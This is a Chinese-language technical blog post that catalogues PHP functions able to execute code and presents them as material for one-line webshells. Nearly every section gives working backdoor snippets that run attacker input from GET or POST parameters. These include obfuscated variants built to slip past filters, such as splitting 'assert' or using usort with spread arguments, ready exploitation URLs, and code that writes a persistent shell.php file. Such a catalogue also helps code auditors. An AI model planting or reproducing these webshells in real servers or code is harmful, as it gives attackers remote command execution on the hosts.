PHP代码执行函数总结

  PHP中能够执行代码的函数,经常使用于编写一句话木马,可能致使代码执行漏洞,这里对代码执行函数作一些概括。php

  常见代码执行函数,如  html

    eval()、assert()、preg_replace()、create_function()正则表达式

    array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()shell

    文件操做函数、动态函数($a($b))数组

一、eval() 安全

  eval() 函数把字符串按照 PHP 代码来计算,如常见的一句话后门程序:<?php eval($_POST[cmd])?>微信

二、assert()函数

   与eval相似,字符串被 assert() 当作 PHP 代码来执行,如:spa

示例代码:rest

<?php 
//?cmd=phpinfo()
assert($_REQUEST[cmd]); 
?>

三、preg_replace()

  mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

  搜索subject中匹配pattern的部分, 以replacement进行替换。

  preg_replace()函数本来是执行一个正则表达式的搜索和替换,但由于存在危险的/e修饰符,使 preg_replace() 将 replacement 参数看成 PHP 代码

示例代码:

<?php 
//?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?>

四、create_function()

  create_function主要用来建立匿名函数,若是没有严格对参数传递进行过滤,攻击者能够构造特殊字符串传递给create_function()执行任意命令。

代码示例:

<?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>

参考连接:

代码安全:PHP create_function()注入命令执行漏洞

http://www.cnseay.com/1901/

http://lovexm.blog.51cto.com/3567383/1743442

http://qqhack8.blog.163.com/blog/static/11414798520153795157139/

五、array_map()

  array_map() 函数将用户自定义函数做用到数组中的每一个值上,并返回用户自定义函数做用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。

 代码示例:

<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>

六、call_user_func()/call_user_func_array ()

  call_user_func — 把第一个参数做为回调函数调用,其他参数是回调函数的参数。

  call_user_func_array — 调用回调函数,并把一个数组参数做为回调函数的参数

<?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

<?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

 七、array_filter()

  array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

  依次将 array 数组中的每一个值传递到 callback 函数。若是 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

<?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>

八、usort()、uasort()

  usort() 经过用户自定义的比较函数对数组进行排序。

  uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。

代码示例:

php环境>=5.6才能用
<?php usort(...$_GET);?>
利用方式:
test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert
[POST]:x=phpinfo();

php环境>=<5.6才能用
<?php usort($_GET,'asse'.'rt');?>
利用方式:
test.php?1=1+1&2=eval($_POST[x])
[POST]:x=phpinfo();

源自:https://www.wd0g.com/?p=190

https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html

九、文件操做函数

  file_put_contents() 函数把一个字符串写入文件中。

  fputs() 函数写入文件

代码示例:

 

<?php 
$test='<?php eval($_POST[cmd]);?>';
file_put_contents('test1.php',$test);
?>
<?php 
fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>'); 
?>

 

 十、动态函数

  PHP函数直接由字符串拼接

代码示例:

<?php 
//?a=assert&b=phpinfo()
$_GET['a']($_GET['b']);
?>

最后

欢迎关注我的微信公众号:Bypass--,每周原创一篇技术干货。 

 

相关文章
相关标签/搜索